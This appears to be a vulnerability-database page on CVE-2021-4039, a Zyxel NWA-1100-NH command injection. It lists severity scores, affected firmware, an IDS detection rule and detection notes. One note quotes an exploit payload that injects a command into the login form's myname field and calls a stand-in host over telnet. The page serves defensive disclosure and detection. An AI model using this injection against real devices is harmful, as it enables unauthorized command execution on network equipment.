CVE-2021-4039
published 2022-03-01CVE-2021-4039: A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware could allow an attacker to execute arbitrary OS commands on the device.
PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
71.05%
99.3th percentile
A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware could allow an attacker to execute arbitrary OS commands on the device.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zyxel | nwa1100-nh_firmware | < 2.12\(aasi.3\)c0 | 2.12\(aasi.3\)c0 |
| zyxel | nwa1100-nh_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT Zyxel NWA-1100-NH Command Injection Attempt (CVE-2021-4039)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:17; content:"/login/login.html"; fast_pattern; http.request_body; content:"myname="; content:"mypasswd="; content:"Submit=Login"; pcre:"/myname=[^&]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/i"; reference:url,www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:url,www.exploit-db.com/exploits/50870; reference:cve,2021-4039; classtype:attempted-admin; sid:2036737; rev:2; metadata:attack_target Networking_Equipment, created_at 2022_06_01, cve CVE_2021_4039, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_26, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
- →Exploit targets POST requests to /login/login.html on port 8081 with shell metacharacters (backtick, semicolon, pipe, ampersand) injected into the `myname` parameter of the login form body. ↗
- →Detect injection by inspecting the `myname` POST body field for URL-encoded or raw shell metacharacters: %60 (backtick), %3b (semicolon), %7c (pipe), %26 (ampersand), as well as command substitution patterns like $( or <(.
- →The exploit payload uses backtick-enclosed OS commands (e.g., `id|telnet yourserverhere 21`) to achieve out-of-band command execution via a reverse telnet connection, which can be used as a callback indicator. ↗
- →The ET rule (sid:2036737) requires all three body tokens — myname=, mypasswd=, and Submit=Login — to be present simultaneously, reducing false positives while matching the exact login form structure.
- →URI match should enforce exact byte size of 17 for /login/login.html to avoid matching longer paths that merely contain this string.
- ·The ET rule is tagged for Perimeter and SSLDecrypt deployments, meaning it will miss exploitation attempts over HTTPS unless TLS inspection is enabled.
- ·All firmware versions before 2.12 are affected; patched version is NWA1100-NH_2.12(AASI.3)C0. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9ww2-qwrq-m7wv: A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware could allow an attacker to execute arbitrary OS commands on t
ghsa_unreviewed·2022-03-02
CVE-2021-4039 [CRITICAL] CWE-78 GHSA-9ww2-qwrq-m7wv: A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware could allow an attacker to execute arbitrary OS commands on t
A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware could allow an attacker to execute arbitrary OS commands on the device.
VulnCheck
Zyxel nwa1100-nh_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-4039 [CRITICAL] Zyxel nwa1100-nh_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Zyxel nwa1100-nh_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware could allow an attacker to execute arbitrary OS commands on the device.
Affected: Zyxel nwa1100-nh_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; https://cujo.com/blog/the-2022-2023-iot-botnet-report-vulnerabilities-targeted/; https://cujo.com/the-2022-2023-iot-botnet-report-vulnerabilities-targeted/
Suricata
ET EXPLOIT Zyxel NWA-1100-NH Command Injection Attempt (CVE-2021-4039)
suricata·2022-06-01·CVSS 9.8
CVE-2021-4039 [CRITICAL] ET EXPLOIT Zyxel NWA-1100-NH Command Injection Attempt (CVE-2021-4039)
ET EXPLOIT Zyxel NWA-1100-NH Command Injection Attempt (CVE-2021-4039)
Rule: alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT Zyxel NWA-1100-NH Command Injection Attempt (CVE-2021-4039)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:17; content:"/login/login.html"; fast_pattern; http.request_body; content:"myname="; content:"mypasswd="; content:"Submit=Login"; pcre:"/myname=[^&]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/i"; reference:url,www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:url,www.exploit-db.com/ex
http://packetstormsecurity.com/files/166752/Zyxel-NWA-1100-NH-Command-Injection.htmlhttps://www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtmlhttp://packetstormsecurity.com/files/166752/Zyxel-NWA-1100-NH-Command-Injection.htmlhttps://www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml
2022-03-01
Published
Exploited in the wild